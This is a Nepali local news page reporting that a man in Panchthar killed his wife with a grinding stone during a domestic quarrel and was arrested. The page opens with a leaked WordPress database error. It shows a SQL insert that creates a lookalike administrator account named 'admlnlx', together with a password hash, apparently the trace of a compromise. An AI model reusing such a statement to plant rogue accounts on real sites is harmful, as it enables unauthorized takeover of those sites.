WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B8ajtFBDjcZtzON1wBXjTVnRYfImY30', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 00:24:09', '', 'admlnlx', 'admlnlx')

लोहोरो प्रहार गरी श्रीमतीको हत्या – Gaule Khabar

लोहोरो प्रहार गरी श्रीमतीको हत्या

लोहोरो प्रहार गरी श्रीमतीको हत्या

पाँचथर । पाँचथरको फाल्गुनन्द गाउँपालिका–२ इम्बुङमा घरायसी झगडामा श्रीमानले लोहोरो प्रहार गर्दा श्रीमतीको मृत्यु भएको छ । इम्बुङका इन्द्रकुमार नेम्वाङले यही पुस ९ गते घरायसी झगडामा आफ्नी श्रीमती ४५ वर्षीया जीवनकुमारी नेम्वाङको टाउकोमा लोहोरोले प्रहार गरेका थिए । लोहोरोले लागेर गम्भीर घाइते भएकी जीवनकुमारीको झापाको बिर्तामोडस्थित बिर्तासिटी अस्पतालमा उपचार भइरहेकामा आइतबार उपचारकै क्रममा मृत्यु भएको थियो ।

जीवनकुमारीको मृत्यु भएपछि उक्त विषयको जानकारी पाएको प्रहरीले लगत्तै इन्द्रकुमारलाई उनकै घरबाट पक्राउ गरेको जिल्ला प्रहरी कार्यालय पाँचथरका सूचना अधिकारी डम्बर विश्वकर्माले जानकारी दिनुभयो । घटनाबारे नेम्वाङमाथि थप अनुसन्धान भइरहेको प्रहरीले जनाएको छ ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका